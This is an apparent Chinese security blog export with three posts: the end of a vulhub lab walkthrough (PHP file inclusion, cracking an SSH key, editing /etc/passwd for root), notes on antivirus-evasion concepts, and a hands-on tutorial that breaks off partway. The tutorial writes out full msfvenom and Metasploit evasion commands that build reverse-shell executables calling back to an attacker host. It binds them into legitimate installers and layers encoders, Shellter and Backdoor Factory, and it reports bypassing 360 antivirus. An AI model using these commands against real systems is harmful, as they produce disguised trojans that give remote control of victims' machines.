<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$filename</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;command&#x27;</span>];</span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$filename</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>文件包含没错了，可以看看其他目录是否存在敏感文件</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/[KTE3AA07]O75A1%7BEM1ETI9.jpg" alt="img"></p>
<h3 id="John"><a href="#John" class="headerlink" title="John"></a>John</h3><p>在<code>/home/mowree/.ssh/</code>目录下可以获得私钥</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220107142131515.png" alt="image-20220107142131515"></p>
<p>用ssh2john.py获取一下hash</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">/usr/share/john/ssh2john.py id_rsa &gt; hash.txt</span><br></pre></td></tr></table></figure>

<p>再用john进行破解，得到密码为<strong>unicorn</strong></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">john ~/桌面/hash.txt -w /usr/share/wordlists/rockyou.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220107143509973.png" alt="image-20220107143509973"></p>
<p>使用ssh连接获得user.txt</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220107144251045.png" alt="image-20220107144251045"></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>简单尝试没有sudo提权</p>
<p>发现/etc/passwd文件任意用户可以读写</p>
<p>那么提权的方式就很多了</p>
<blockquote>
<p>1、自己添加一个拥有root权限的用户</p>
<p>2、修改root用户的密码</p>
</blockquote>
<p>我这里直接修改了root用户本身的密码为root</p>
<p>先用openssl生成密码为：root （密码随意）的哈希值</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">openssl passwd -1 root</span><br></pre></td></tr></table></figure>

<p>直接修改<code>/etc/passwd</code>文件即可</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220107145912769.png" alt="image-20220107145912769"></p>
<p>end</p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>vulhub</tag>
      </tags>
  </entry>
  <entry>
    <title>远控免杀——概念</title>
    <url>/2022/02/06/%E8%BF%9C%E6%8E%A7%E5%85%8D%E6%9D%80%E2%80%94%E2%80%94%E6%A6%82%E5%BF%B5/</url>
    <content><![CDATA[<h1 id="远控免杀——概念"><a href="#远控免杀——概念" class="headerlink" title="远控免杀——概念"></a>远控免杀——概念</h1><h2 id="免杀概念"><a href="#免杀概念" class="headerlink" title="免杀概念"></a>免杀概念</h2><p><em>免杀</em>技术全称为反杀毒技术Anti Anti- Virus简称“<em>免杀</em>”，它指的是一种能使病毒木马免于被杀毒软件查杀的技术</p>
<span id="more"></span>

<h2 id="杀软检测方式"><a href="#杀软检测方式" class="headerlink" title="杀软检测方式"></a>杀软检测方式</h2><h3 id="扫描技术"><a href="#扫描技术" class="headerlink" title="扫描技术"></a>扫描技术</h3><ol>
<li>扫描压缩包：对压缩包和封装文件作分析检测</li>
<li>程序篡改防护：避免恶意程序通过篡改删除杀毒侦测程序从而破坏电脑</li>
<li>修复技术：对被恶意程序损坏的文件进行还原</li>
<li>急救盘杀毒：利用空白U盘制作急救启动盘来检测电脑病毒</li>
<li>智能扫描：扫描检测常用磁盘、系统关键位置，耗时较短</li>
<li>全盘扫描：扫描全部磁盘，耗时较长</li>
<li>勒索软件防护：保护电脑中的文件不被恶意加密</li>
<li>开机扫描：开机自动扫描，扫描压缩文档和可能不需要的程序</li>
</ol>
<h3 id="监控技术"><a href="#监控技术" class="headerlink" title="监控技术"></a>监控技术</h3><ol>
<li>内存监控：发现内存中存在病毒并主动报警；监控所有进程；监控读取到内存中的文件；监控读取到内存中的网络数据</li>
<li>文件监控：发现写到磁盘上的文件中存在病毒或者被病毒感染，主动报警</li>
<li>邮件监控：电子邮件的附件中存在病毒时进行拦截</li>
<li>网页防护：阻止网络攻击和不安全的下载行为</li>
<li>行为防护：警示用户应用程序的可疑行为</li>
</ol>
<h3 id="扫描引擎"><a href="#扫描引擎" class="headerlink" title="扫描引擎"></a>扫描引擎</h3><h4 id="特征码扫描"><a href="#特征码扫描" class="headerlink" title="特征码扫描"></a>特征码扫描</h4><p>特征码扫描是传统杀毒软件的主要利器，是病毒诊断方法中，扫描法的一种。将扫描信息与病毒特征库进行对照，信息与病毒特征吻合的文件会被判断为存在病毒。病毒的特征码一般是文件内部的一段或者几段代码，特殊性在于不大可能与正常程序代码吻合。抽取的代码长度要适当，保证特征码唯一性的同时缩减病毒扫描的空间与时间开销</p>
<blockquote>
<p>特征码：能识别一个程序是一个病毒的一段不大于64字节的特征串</p>
</blockquote>
<p><strong>特征码类别：</strong></p>
<ol>
<li>文件特征码：单一文件特征码、复合文件特征码（通过多处特征进行判断）。针对<strong>文件病毒</strong></li>
<li>内存特征码：单一内存特征码、复合内存特征码。针对<strong>内存病毒</strong></li>
</ol>
<p>优点：速度快；准确率相对较高，误杀操作较少；基本不需要用户参与判断</p>
<p>缺点：采用病毒特征代码检测，面对不断出现的新型病毒需要不断更新病毒库，否则检测工具的老化会失去使用价值；病毒特征代码检测无法对不知道特征码的新病毒进行检测；病毒特征码本身有问题可能会出现误报，数据误删</p>
<h4 id="文件校验和"><a href="#文件校验和" class="headerlink" title="文件校验和"></a>文件校验和</h4><p>对文件扫描后，计算正常文件内容的校验和，将校验和写入文件中或写入别的文件保存；定期或每次在使用文件前，检查文件现在内容算出的校验和与原来保存的校验和是否一致，从而判断文件是否被感染</p>
<p>优点：方法简单；可发现未知病毒；能发现文件细微变化</p>
<p>缺点：误报率高；效率低；不能识别病毒</p>
<h4 id="行为检测"><a href="#行为检测" class="headerlink" title="行为检测"></a>行为检测</h4><p>通过长期观察研究总结病毒的特殊行为，并且这些行为在正常程序行为中比较罕见。当程序运行时，监视进程的各种行为，发现病毒行为，立即报警。</p>
<p>优点：可发现未知病毒；可准确预报未知的大多病毒</p>
<p>缺点：可能误报；不能识别病毒；需要用户参与判断</p>
<h4 id="主动防御"><a href="#主动防御" class="headerlink" title="主动防御"></a>主动防御</h4><p>不需要病毒特征码支持，杀软自行分析扫描目标程序的行为，根据预先设定的规则进行主动的病毒判断清除等操作。</p>
<p>实现难度较高，计算机智能也是在一系列规则下诞生的，该技术还需要不断的研究进步</p>
<h4 id="机器学习识别"><a href="#机器学习识别" class="headerlink" title="机器学习识别"></a>机器学习识别</h4><p>既可以做静态样本的二进制分析，又可以运行在沙箱动态行为分析中，内容/行为+算法模式。随着深度学习的发展，运用深度学习技术来识别病毒特征</p>
<h2 id="免杀技术"><a href="#免杀技术" class="headerlink" title="免杀技术"></a>免杀技术</h2><p>免杀技术最基本思想就是破坏病毒木马本身的特征，可以是特征码，也可以是行为特征，破坏其固有特征并保留其原有功能</p>
<h3 id="修改特征码"><a href="#修改特征码" class="headerlink" title="修改特征码"></a>修改特征码</h3><h4 id="数据"><a href="#数据" class="headerlink" title="数据"></a>数据</h4><p>特征码定位到数据位置不容易修改</p>
<ol>
<li>字符串，如果不影响程序逻辑，可替换大小写；无关紧要的数据，随意替换</li>
<li>整数，如果不影响结果，可替换值或清零等</li>
<li>地址，基本不能修改，具体看情况</li>
<li>PE头数据，无用数据清零或修改，有用数据具体情况具体分析</li>
<li>直接修改代码访问数据的地址，数据放到其他地址</li>
</ol>
<h4 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h4><p>特征码定位到代码</p>
<ol>
<li>等价替换汇编代码，例如<code>mov eax，0</code>可以换成<code>xor eax，eax</code>，直接结果相同二进制代码不同</li>
<li>在不影响逻辑的情况下，交换代码顺序</li>
<li>代码块位移，将代码块移动到不用的内存位置，通过加入jmp addr跳过去执行</li>
</ol>
<hr>
<p>修改特征码最重要的是定位特征码，但是定位并修改特征码后不代表病毒木马程序能正常运行，各个杀软厂商的特征库不同，一般修改特征码只能对一类杀软起效。</p>
<h3 id="添加花指令"><a href="#添加花指令" class="headerlink" title="添加花指令"></a>添加花指令</h3><p>花指令也可称之为垃圾指令。花指令本身对程序的执行结果没有影响，存在的目的是阻止反汇编程序或对反汇编设置的障碍</p>
<p>⼤多数反病毒软件是靠特征码来判断⽂件是否有毒的，⽽为了提⾼精度，现在的特征码都是在⼀定偏移量限制之内的，否则会对反病毒软件的效率产⽣严重的影响。</p>
<p>通过添加花指令，程序的部分偏移会受到影响。反病毒软件如果不能识别花指令，那么检测特征码的偏移量就会受到影响，从而无法正常检测木马病毒</p>
<p><strong>如何添加花指令：</strong></p>
<ol>
<li>加数据计算代码，加减乘除各类组合</li>
<li>加字符串操作代码，增加、删除、查找、替换等</li>
<li>加多层跳转，跳转间加无效指令</li>
<li>加貌似有效的API调用，如LoadLibrary+GetProcAddr+API等</li>
<li>…</li>
</ol>
<h3 id="加壳免杀"><a href="#加壳免杀" class="headerlink" title="加壳免杀"></a>加壳免杀</h3><p>可以将加壳简单理解为：解密器/解压器+加密器/压缩器（原始代码）</p>
<p>通过加密器/压缩器将原始代码进行加密压缩，让其特征码变化隐藏，然后组装上解密器/解压器到文件中，运行是先运行解密/解压器，将加密压缩内容解密解压，然后继续运行原始代码</p>
<h4 id="加冷门壳"><a href="#加冷门壳" class="headerlink" title="加冷门壳"></a>加冷门壳</h4><p>壳也有特征，知名的壳很容易被识别出来，或者自动脱壳并查杀</p>
<h4 id="改壳"><a href="#改壳" class="headerlink" title="改壳"></a>改壳</h4><p>将开源的压缩壳进行修改，比如修改入口，区段信息修改，入口代码移位</p>
<h3 id="内存免杀"><a href="#内存免杀" class="headerlink" title="内存免杀"></a>内存免杀</h3><p>大多数反病毒软件的文件扫描与内存扫描采用的不是同一套特征码，文件免杀只能过静态文件扫描，执行时会读入内存，没有做内存免杀还是会被杀软识别出来</p>
<p>如果是利用Windows自身提供的API来将加密或者封装好的shellcode写入到内存执行的话,将会大大增加查杀的难度</p>
<h3 id="二次编译"><a href="#二次编译" class="headerlink" title="二次编译"></a>二次编译</h3><p>通过各种编码器、各种语言对shellcode进行二次编码从而达到免杀效果</p>
<h3 id="分离免杀"><a href="#分离免杀" class="headerlink" title="分离免杀"></a>分离免杀</h3><p>将shellcode和加载器分离。shellcode的加载器本身并不包含恶意代码，当加载器运行时，从程序之外加载shellcode执行</p>
<p>将PE文件以某种加密方式进行存储后使用加载器读取PE文件并且解密，最后放入内存中执行</p>
<h3 id="资源修改"><a href="#资源修改" class="headerlink" title="资源修改"></a>资源修改</h3><p>有些杀软设置有扫描白名单，比如程序图标为杀软就可过查杀</p>
<h4 id="加资源"><a href="#加资源" class="headerlink" title="加资源"></a>加资源</h4><p>使用ResHacker对文件进行资源操作，将正常软件的资源（如图片、版本信息、对话框等）加入到自己的软件</p>
<h4 id="替换资源"><a href="#替换资源" class="headerlink" title="替换资源"></a>替换资源</h4><p>使用ResHacker替换无用资源（Version等）</p>
<h4 id="加签名"><a href="#加签名" class="headerlink" title="加签名"></a>加签名</h4><p>使用签名伪造工具，将正常软件的签名信息假如自己的软件中</p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>免杀</tag>
      </tags>
  </entry>
  <entry>
    <title>远控免杀——工具篇</title>
    <url>/2022/02/15/%E8%BF%9C%E6%8E%A7%E5%85%8D%E6%9D%80%E2%80%94%E2%80%94%E5%B7%A5%E5%85%B7%E7%AF%87/</url>
    <content><![CDATA[<h1 id="远控免杀——工具篇"><a href="#远控免杀——工具篇" class="headerlink" title="远控免杀——工具篇"></a>远控免杀——工具篇</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>免杀对个人而言是一个熟悉又陌生的概念，之前只知道msf上进行简单的encode来免杀，现在还是从基本的工具开始学起</p>
<p>实验环境采用Kali+Win7虚拟机，测试机安装360全家桶</p>
<span id="more"></span>

<h2 id="msf自带免杀"><a href="#msf自带免杀" class="headerlink" title="msf自带免杀"></a>msf自带免杀</h2><h3 id="原始payload"><a href="#原始payload" class="headerlink" title="原始payload"></a>原始payload</h3><p>直接用msfvenom生成原始payload</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -f exe -o payload1.exe</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210193805172.png" alt="image-20220210193805172"></p>
<p>360静态动态均可查杀</p>
<h3 id="编码处理"><a href="#编码处理" class="headerlink" title="编码处理"></a>编码处理</h3><p>评级最⾼的两个encoder为<code>cmd/powershell_base64</code>和 <code>x86/shikata_ga_nai</code></p>
<p>编码次数为15并去掉空字符</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -e x86/shikata_ga_nai -b &quot;\x00&quot; -i 15 -f exe -o payload2.exe</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210201725861.png" alt="image-20220210201725861"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210201847245.png" alt="image-20220210201847245"></p>
<p>360静态动态均可查杀</p>
<h3 id="捆绑"><a href="#捆绑" class="headerlink" title="捆绑"></a>捆绑</h3><p>使用msfvenom中的<code>-x</code>参数可以指定一个可执行文件作为模板，将payload嵌入其中，<code>-x</code> 指定文件路径</p>
<p>我这里捆绑的是360安全卫士</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -x 360Safe.exe -f exe -o payload3.exe</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210202657179.png" alt="image-20220210202657179"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210202821265.png" alt="image-20220210202821265"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210202853855.png" alt="image-20220210202853855"></p>
<p>360安全卫士静态没扫出来，360杀毒静态查杀，动态均查杀</p>
<h3 id="捆绑-编码"><a href="#捆绑-编码" class="headerlink" title="捆绑+编码"></a>捆绑+编码</h3><p>上面两种方法的结合</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -e x86/shikata_ga_nai -x 360Safe.exe -i 15 -f exe -o payload4.exe</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210203326937.png" alt="image-20220210203326937"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210203539659.png" alt="image-20220210203539659"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210203553483.png" alt="image-20220210203553483"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210203627448.png" alt="image-20220210203627448"></p>
<p>360全家桶静态均可过，动态均查杀</p>
<h3 id="多重编码-捆绑"><a href="#多重编码-捆绑" class="headerlink" title="多重编码+捆绑"></a>多重编码+捆绑</h3><p>通过管道符，让msfvenom用不同的编码器反复进行编码混淆</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.221.128 LPORT=4444 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -x 360Safe.exe -f exe &gt; payload5.exe</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210205818844.png" alt="image-20220210205818844"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210205930063.png" alt="image-20220210205930063"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210210357725.png" alt="image-20220210210357725"></p>
<p>360全家桶完全没反应？！</p>
<h3 id="Evasion模块"><a href="#Evasion模块" class="headerlink" title="Evasion模块"></a>Evasion模块</h3><p>metasploit 5.0引入的一个新模块</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211154339417.png" alt="image-20220211154339417"></p>
<h4 id="exe"><a href="#exe" class="headerlink" title="exe"></a>exe</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msf6 &gt; use evasion/windows/windows_defender_exe</span><br><span class="line">msf6 evasion(windows/windows_defender_exe) &gt; set filename payload6.exe</span><br><span class="line">msf6 evasion(windows/windows_defender_exe) &gt; set payload windows/meterpreter/reverse_tcp</span><br><span class="line">msf6 evasion(windows/windows_defender_exe) &gt; set lhost 192.168.221.128</span><br><span class="line">msf6 evasion(windows/windows_defender_exe) &gt; set lport 4444</span><br><span class="line">msf6 evasion(windows/windows_defender_exe) &gt; run</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211154547017.png" alt="image-20220211154547017"></p>
<p>监听</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">handler -H 192.168.221.128 -P 4444 -p windows/meterpreter/reverse_tcp</span><br><span class="line">jobs</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211154144937.png" alt="image-20220211154144937"></p>
<p>还没扫描就被删除了</p>
<h4 id="hta"><a href="#hta" class="headerlink" title="hta"></a>hta</h4><p>用<code>evasion/windows/windows_defender_js_hta</code>模块生成payload</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211155757515.png" alt="image-20220211155757515"></p>
<p>360杀毒静态可查杀</p>
<h4 id="install-util"><a href="#install-util" class="headerlink" title="install_util"></a>install_util</h4><p>用<code>evasion/windows/applocker_evasion_install_util</code>模块生成payload</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211171158049.png" alt="image-20220211171158049"></p>
<p>使用<code>csc.exe</code>进行编译后用<code>InstallUtil.exe</code>加载文件</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211170422141.png" alt="image-20220211170422141"></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe</span><br></pre></td></tr></table></figure>

<p>360动态可查杀</p>
<h3 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h3><p>MSF在被各大安全厂商盯这么紧的情况下，<code>多重编码＋捆绑</code>的方式能免杀成功还是出乎意料的</p>
<h2 id="Veil"><a href="#Veil" class="headerlink" title="Veil"></a>Veil</h2><h3 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h3><p>为了方便直接拉取veil镜像</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">docker pull mattiasohlsson/veil</span><br></pre></td></tr></table></figure>

<p>拉取成功，执行如下命令</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil</span><br></pre></td></tr></table></figure>

<p>将Kali的<code>/tmp/veil-output</code>目录映射到docker里面，这样Veil生成的payload可以直接在kali里使用</p>
<h3 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h3><p>Veil有两个免杀工具，Evasion和Ordnance</p>
<p>Evasion用做文件免杀</p>
<p>Ordnance生成在Veil-Evasion中使用的shellcode</p>
<h3 id="exe-1"><a href="#exe-1" class="headerlink" title="exe"></a>exe</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">use 1                         //选择Evasionlist                          //查看payload列表use 16                        //go语言生成msf的payloadset lhost 192.168.221.128     set lport 4445generatego_msf                        //生成的payload名称</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211173556181.png" alt="image-20220211173556181"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211174519477.png" alt="image-20220211174519477"></p>
<p>360静态动态均可查杀</p>
<h3 id="Veil-mingw-w64"><a href="#Veil-mingw-w64" class="headerlink" title="Veil+mingw-w64"></a>Veil+mingw-w64</h3><p>（待补）</p>
<h2 id="Venom"><a href="#Venom" class="headerlink" title="Venom"></a>Venom</h2><p>（安装出问题，待补）</p>
<h2 id="Shellter"><a href="#Shellter" class="headerlink" title="Shellter"></a>Shellter</h2><h3 id="安装-1"><a href="#安装-1" class="headerlink" title="安装"></a>安装</h3><p>某些版本的Kali自带，没有的可以自行安装，安装过程中不会出现特别坑爹的问题，比较友好</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">apt-get install shellter</span><br></pre></td></tr></table></figure>

<p>运行报错，有提示</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">dpkg --add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</span><br></pre></td></tr></table></figure>

<p>安装完毕</p>
<h3 id="使用-1"><a href="#使用-1" class="headerlink" title="使用"></a>使用</h3><p>准备一个pe文件<code>npp.exe</code>，之后Shellter会备份该pe文件，因为生成的payload会覆盖原来的<code>npp.exe</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211210737098.png" alt="image-20220211210737098"></p>
<p>接下来根据情况来选择即可，我选的<code>windows/meterpreter/reverse_tcp</code></p>
<p>中间有个<code>Enable Stealth Mode</code>，是否使用隐身模式，特意做了两种来尝试</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211195832317.png" alt="image-20220211195832317"></p>
<p>选择隐身模式生成的payload执行后被查杀</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211210316878.png" alt="image-20220211210316878"></p>
<p>选择非隐身模式生成的payload，成功绕过360！</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211211221212.png" alt="image-20220211211221212"></p>
<h3 id="小结-1"><a href="#小结-1" class="headerlink" title="小结"></a>小结</h3><p>Shellter使用方便，免杀效果不错。第一次用<code>360Safe.exe</code>生成的payload一直没法监听成功也没有被查杀。搜索了下得用32位的，改用老版本<code>notepad++</code>的安装程序，成功收到meterpreter，对于为啥选择非隐身能绕过360还是不太懂</p>
<h2 id="BackDoor-Factory"><a href="#BackDoor-Factory" class="headerlink" title="BackDoor-Factory"></a>BackDoor-Factory</h2><p>用户可以在不破坏原有可执行文件的功能的前提下，在文件的代码裂隙中插入shellcode，支持自定义shellcode</p>
<h3 id="安装-2"><a href="#安装-2" class="headerlink" title="安装"></a>安装</h3><p>直接拉取docker镜像</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">docker pull secretsquirrel/the-backdoor-factory</span><br><span class="line">docker run -it secretsquirrel/the-backdoor-factory bash</span><br><span class="line"># ./backdoor.py</span><br></pre></td></tr></table></figure>

<p>运行成功</p>
<h3 id="使用-2"><a href="#使用-2" class="headerlink" title="使用"></a>使用</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">docker run -it -v /root/test:/root/payload:z secretsquirrel/the-backdoor-factory</span><br></pre></td></tr></table></figure>

<p>跟Veil使用相似，进行文件夹映射</p>
<h4 id="程序测试"><a href="#程序测试" class="headerlink" title="程序测试"></a>程序测试</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python backdoor.py -f /root/payload/360Safe.exe -S</span><br></pre></td></tr></table></figure>

<blockquote>
<p>-f: 指定被测试程序</p>
<p>-S: 检查程序是否可被利用</p>
</blockquote>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212125645235.png" alt="image-20220212125645235"></p>
<p>检查exe是否能插入shellcode</p>
<h4 id="搜索Code-Caves"><a href="#搜索Code-Caves" class="headerlink" title="搜索Code Caves"></a>搜索Code Caves</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python backdoor.py -f /root/payload/360Safe.exe -c -l 600</span><br></pre></td></tr></table></figure>

<blockquote>
<p>-c: 查找Code Cave</p>
<p>-l: Code Cave Size，用于插入shellcode</p>
</blockquote>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212130536451.png" alt="image-20220212130536451"></p>
<p>找到了5个可利用点</p>
<h4 id="获取payload"><a href="#获取payload" class="headerlink" title="获取payload"></a>获取payload</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python backdoor.py -f /root/payload/360Safe.exe -s -show</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212130803057.png" alt="image-20220212130803057"></p>
<blockquote>
<ol>
<li>reverse_shell_tcp_inline ：对应msf： use exploit/multi/handlerset</li>
</ol>
<p>payload windows/meterpreter/reverse_tcp</p>
<ol start="2">
<li>meterpreter_reverse_https_threaded ：对应msf： use</li>
</ol>
<p>exploit/multi/handlerset payload windows/meterpreter/reverse_https</p>
<ol start="3">
<li>iat_reverse_tcp_inline : 增加了修复IAT的功能，避免reverse_shell_tcp_inline执⾏失败</li>
<li>iat_reverse_tcp_stager_threaded : 功能类似上一条</li>
<li>user_supplied_shellcode_threaded ：对应的msf： use</li>
</ol>
<p>exploit/multi/handlerset payload windows/meterpreter/reverse_tcp``⾃定义</p>
<p>shellcode</p>
</blockquote>
<h4 id="生成payload"><a href="#生成payload" class="headerlink" title="生成payload"></a>生成payload</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python backdoor.py -f /root/payload/360Safe.exe -s iat_reverse_tcp_stager_threaded -H 192.168.221.128 -P 4444 -J -o payload8.exe</span><br></pre></td></tr></table></figure>

<blockquote>
<p>-J: 选择多个Code Cave注入 </p>
</blockquote>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212140152504.png" alt="image-20220212140152504"></p>
<p>360动静态均可查杀</p>
<h3 id="小结-2"><a href="#小结-2" class="headerlink" title="小结"></a>小结</h3><p>缝隙插入代码的想法比较有意思，但是免杀效果经测试不太行</p>
<h2 id="Avet"><a href="#Avet" class="headerlink" title="Avet"></a>Avet</h2><p>（装了近3个小时没法用，心态崩了）</p>
<h2 id="TheFatRat"><a href="#TheFatRat" class="headerlink" title="TheFatRat"></a>TheFatRat</h2><p>（待补）</p>
<h2 id="Avoidz"><a href="#Avoidz" class="headerlink" title="Avoidz"></a>Avoidz</h2><p>（安装出错，待补）</p>
<h2 id="Green-Hat-Suite"><a href="#Green-Hat-Suite" class="headerlink" title="Green-Hat-Suite"></a>Green-Hat-Suite</h2><p>（待补）</p>
<h2 id="zirikatu"><a href="#zirikatu" class="headerlink" title="zirikatu"></a>zirikatu</h2><p>zirikatu利用msfvenom生成shellcode，再进行后续处理并生成exe</p>
<h3 id="安装-3"><a href="#安装-3" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">chmod +x zirikatu.sh</span><br><span class="line">./zirikatu.sh</span><br></pre></td></tr></table></figure>

<p>运行成功</p>
<h3 id="使用-3"><a href="#使用-3" class="headerlink" title="使用"></a>使用</h3><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212180240192.png" alt="image-20220212180240192"></p>
<p>zirikatu可以修改图标，增加错误提示，监听等功能</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212180215659.png" alt="image-20220212180215659"></p>
<p>360静态可查杀</p>
<h3 id="小结-3"><a href="#小结-3" class="headerlink" title="小结"></a>小结</h3><p>网上看到的文章中这个操作简单体量小的工具居然能免杀360火绒，测试后静态查杀就翻车了，这个工具也挺老了后续没有更新，可惜</p>
<h2 id="AVIator"><a href="#AVIator" class="headerlink" title="AVIator"></a>AVIator</h2><p>AVIator使⽤AES加密来加密给定的Shellcode加密，⽣成⼀个包含加密有效负载的可</p>
<p>执⾏⽂件，然后使⽤各种注⼊技术将shellcode解密并注⼊到⽬标系统，从⽽绕过杀</p>
<p>毒软件的检测</p>
<p>只支持windows，C#开发</p>
<h3 id="安装-4"><a href="#安装-4" class="headerlink" title="安装"></a>安装</h3><p>直接下载压缩包</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">https://github.com/Ch0pin/AVIator</span><br></pre></td></tr></table></figure>

<p>解压运行exe即可</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212181426434.png" alt="image-20220212181426434"></p>
<h3 id="使用-4"><a href="#使用-4" class="headerlink" title="使用"></a>使用</h3><p>用msf生成基于C#的shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -f csharp -o payload11.c</span><br></pre></td></tr></table></figure>

<p>复制<code>payload11.c</code>中{}内的内容到payload，加密生成新payload</p>
